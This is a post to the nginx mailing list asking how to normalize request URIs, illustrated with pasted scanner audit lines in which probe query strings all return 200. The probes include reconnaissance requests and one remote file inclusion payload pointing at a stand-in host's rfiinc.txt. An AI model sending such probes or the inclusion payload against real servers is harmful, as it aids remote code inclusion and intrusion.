The last security audit revealed the following: V:Wed Apr 15 20:58:19 2015 - 200 for GET: /?mod=node&nid=some_thing&op=view V:Wed Apr 15 20:58:43 2015 - 200 for GET: /?Open V:Wed Apr 15 20:58:43 2015 - 200 for GET: /?OpenServer V:Wed Apr 15 20:59:16 2015 - 200 for GET: /?sql_debug=1 V:Wed Apr 15 20:59:40 2015 - 200 for GET: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 V:Wed Apr 15 20:59:40 2015 - 200 for GET: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 V:Wed Apr 15 20:59:40 2015 - 200 for GET: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42 V:Wed Apr 15 20:59:40 2015 - 200 for GET: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42 V:Wed Apr 15 20:59:43 2015 - 200 for GET: /?PageServices V:Wed Apr 15 20:59:43 2015 - 200 for GET: /?wp-cs-dump V:Wed Apr 15 21:03:06 2015 - 200 for GET: /?D=A V:Wed Apr 15 21:04:58 2015 - 200 for GET: /?_CONFIG[files][functions_page]=http://example.com/rfiinc.txt? V:Wed Apr 15 21:08:00 2015 - 200 for GET: /?-s V:Wed Apr 15 21:08:09 2015 - 200 for GET: /?q[]=x V:Wed Apr 15 21:08:41 2015 - 200 for GET: /?sc_mode=edit V:Wed Apr 15 21:09:30 2015 - 200 for GET: /?admin
In plain words, there is an infinite amount of $request_uri that returns the content of the canonical address. You can test your own domain "example.com": canonical: http://example.com/ unwanted variants: http://example.com/?mod=node&nid=some_thing&op=view http://example.com/?Open http://example.com/?OpenServer ... Is there an nginx parameter to normalize this type of $uri? Posted at Nginx Forum: http://forum.nginx.org/read.php?2,258101,258101#msg-258101 _______________________________________________ nginx mailing list [email protected] http://mailman.nginx.org/mailman/listinfo/nginx
